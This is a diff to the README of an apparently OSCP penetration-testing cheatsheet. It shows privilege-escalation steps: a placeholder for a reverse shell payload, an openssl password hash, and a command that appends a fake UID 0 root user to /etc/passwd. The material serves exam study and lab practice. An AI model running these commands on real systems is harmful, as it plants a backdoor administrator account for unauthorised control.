Desm0ndChan/OSCP-cheatsheet/README.md

 #3.
 Call reverse shell
 #add reverse shell payload to the script
 #4. add new privileged user to /etc/passwd
-#Create a new user password with openssl
+#Create a new user password with openssl in the target machine
 openssl passwd 123
 #append the new user to /etc/passwd in such format
 echo "Fakeuser:${HASH}:0:0:root:/root:/bin/bash" >> /etc/passwd